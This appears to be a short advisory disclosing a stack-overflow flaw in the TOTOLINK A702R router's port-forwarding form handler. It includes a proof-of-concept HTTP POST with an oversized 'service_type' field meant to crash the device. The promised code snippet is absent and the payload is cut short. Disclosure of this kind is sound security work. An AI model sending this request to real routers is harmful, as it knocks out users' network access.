Critical Vulnerability Information Overview Vendor: TOTOLINK Product: A702R Version: V4.0.0-B20230721.1521 Type: Stack Overflow Vulnerability Description The TOTOLINK A702R router running firmware version V4.0.0-B20230721.1521 is affected by a severe buffer overflow vulnerability. This vulnerability can be triggered via the router's endpoint. Attackers can exploit this by sending a malicious HTTP POST request to perform a Denial of Service (DoS) attack. Vulnerability Details The buffer overflow occurs in the following code snippet: POC (Proof of Concept) ```http POST /boafm/formPortFw HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1071 Origin: http://192.168.0.1 Connection: keep-alive Referer: http://192.168.0.1/title.htm sessionCheck=65d7926158c4ad1116d49b8f27a5220d&addPortFw=a&service_type=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa